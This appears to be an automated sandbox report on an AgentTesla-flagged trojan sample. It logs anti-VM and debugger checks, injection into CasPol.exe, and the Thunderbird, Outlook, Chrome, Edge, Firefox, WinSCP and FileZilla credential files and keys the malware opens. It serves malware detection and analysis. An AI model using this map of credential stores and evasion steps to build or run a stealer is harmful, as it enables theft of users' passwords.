Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Code function: 1_2_02A106AA rdtsc

1_2_02A106AA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Code function: LoadLibraryA,K32EnumDeviceDrivers,

1_2_02A26CC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	API call chain: ExitProcess graph end node			graph_1-22737
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	API call chain: ExitProcess graph end node			graph_1-22739

Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: CompanyNameVMware, Inc.j!
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: http://www.vmware.com/0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18483902290.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23221722008.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllques
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: VMware, Inc.
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18483902290.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23221722008.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: VMware, Inc.1!0
Source: CasPol.exe, 00000005.00000002.23219964862.0000000001367000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWs
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18483902290.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23221722008.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: svchost.exe, 00000004.00000002.19521588046.000001602FC86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.19518711686.000001602DE2A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23220195823.0000000001389000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000002.18817783819.000001F8CEA48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: VMware, Inc.1
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: VMware, Inc.0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: ProductNameVMware SVGA 3D`
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18483614717.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18483614717.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18483902290.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23221722008.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: LegalCopyrightCopyright (C) 1998-2021 VMware, Inc.Z
Source: MpSigStub.exe, 00000013.00000003.18811101453.000001F8CDE5D000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000002.18816836580.000001F8CDE5D000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18809578323.000001F8CDE5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`E
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18483902290.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23221722008.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: CasPol.exe, 00000005.00000002.23219609628.000000000132B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`#7
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: noreply@vmware.com0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: FileDescriptionVMware SVGA 3D Device API Module:
Source: CasPol.exe, 00000005.00000002.23221722008.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: mpam-60574f34.exe, 00000010.00000003.18544926204.0000016C07983000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: P]xMicrosoft HvVMwareVMware
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18483902290.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23221722008.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: CasPol.exe, 00000005.00000002.23221722008.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: mpam-60574f34.exe, 00000010.00000003.18544926204.0000016C07983000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: mpam-60574f34.exe, 00000010.00000003.18576459220.0000016C07988000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18758774396.000001F8CDE41000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [read : ToSubclass] boolean IsVirtualMachine = FALSE;
Source: mpam-60574f34.exe, 00000010.00000003.18516111834.0000016C07981000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <!-- DQYJKoZIhvcNAQEFBQACBQDl8FgVMCIYDzIwMjIwNDAxMDA0MDUzWhgPMjAyMjA0 -->
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18483902290.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23221722008.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18483902290.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23221722008.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000005.00000002.23221722008.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405C49
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_00406873 FindFirstFileW,FindClose,	1_2_00406873
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_0040290B FindFirstFileW,	1_2_0040290B
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44DADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_00007FF6F44DADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44DB030 FindNextFileW,FindClose,FindFirstFileW,	7_2_00007FF6F44DB030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F448F810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,	7_2_00007FF6F448F810
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4502504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_00007FF6F4502504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A1B030 FindNextFileW,FindClose,FindFirstFileW,	19_2_00007FF7D3A1B030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A1ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,	19_2_00007FF7D3A1ADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A42504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_00007FF7D3A42504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39CF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,	19_2_00007FF7D39CF810

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Code function: 1_2_6F3D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_6F3D1BFF

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C2BD mov eax, dword ptr fs:[00000030h]	1_2_02A1C2BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C686 mov eax, dword ptr fs:[00000030h]	1_2_02A1C686
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C2DF mov eax, dword ptr fs:[00000030h]	1_2_02A1C2DF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A2425B mov eax, dword ptr fs:[00000030h]	1_2_02A2425B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C387 mov eax, dword ptr fs:[00000030h]	1_2_02A1C387
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A257E5 mov eax, dword ptr fs:[00000030h]	1_2_02A257E5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C3D4 mov eax, dword ptr fs:[00000030h]	1_2_02A1C3D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C4B7 mov ebx, dword ptr fs:[00000030h]	1_2_02A1C4B7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C4B7 mov eax, dword ptr fs:[00000030h]	1_2_02A1C4B7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C4D3 mov ebx, dword ptr fs:[00000030h]	1_2_02A1C4D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C438 mov eax, dword ptr fs:[00000030h]	1_2_02A1C438
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A2390B mov eax, dword ptr fs:[00000030h]	1_2_02A2390B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe

Code function: 7_2_00007FF6F44FBD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_00007FF6F44FBD68

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe

Code function: 7_2_00007FF6F44F4A10 GetProcessHeap,

7_2_00007FF6F44F4A10

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Code function: 1_2_02A106AA rdtsc

1_2_02A106AA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 5_2_205F5C20 LdrInitializeThunk,

5_2_205F5C20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44FB798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF6F44FB798
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44FBD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF6F44FBD68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44FBF4C SetUnhandledExceptionFilter,	7_2_00007FF6F44FBF4C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44E3BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF6F44E3BFC
Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpengine.exe	Code function: 12_2_00007FF71C589808 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00007FF71C589808
Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpengine.exe	Code function: 12_2_00007FF71C589C54 SetUnhandledExceptionFilter,	12_2_00007FF71C589C54
Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpengine.exe	Code function: 12_2_00007FF71C589AAC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00007FF71C589AAC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A3B798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_00007FF7D3A3B798
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A23BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00007FF7D3A23BFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A3BF4C SetUnhandledExceptionFilter,	19_2_00007FF7D3A3BF4C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A3BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00007FF7D3A3BD68

HIPS / PFW / Operating System Protection Evasion

DLL side loading technique detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\X86\MpOAV.dll

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F30000

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\3FCB5F68-CD33-FF2F-34AE-798C9A7026D4.man "/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll" "/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll" "/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll"

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe"

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe

Code function: 7_2_00007FF6F44DE0C4 AllocateAndInitializeSid,FreeSid,

7_2_00007FF6F44DE0C4

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe

Code function: 7_2_00007FF6F44DF884 GetCurrentProcess,GetLengthSid,InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetLastError,CloseHandle,SetLastError,

7_2_00007FF6F44DF884

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe

Code function: 7_2_00007FF6F44D418C cpuid

7_2_00007FF6F44D418C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe

Code function: 7_2_00007FF6F44808C8 GetSystemTime,GetDateFormatW,GetTimeFormatW,GetCurrentProcessId,

7_2_00007FF6F44808C8

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe

Code function: 7_2_00007FF6F448F3E8 GetCurrentProcessId,GetCurrentProcessId,CreateNamedPipeW,GetCurrentProcessId,

7_2_00007FF6F448F3E8

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

1_2_0040352D

Source: mpam-60574f34.exe

Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 3872, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Source: Yara match	File source: 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
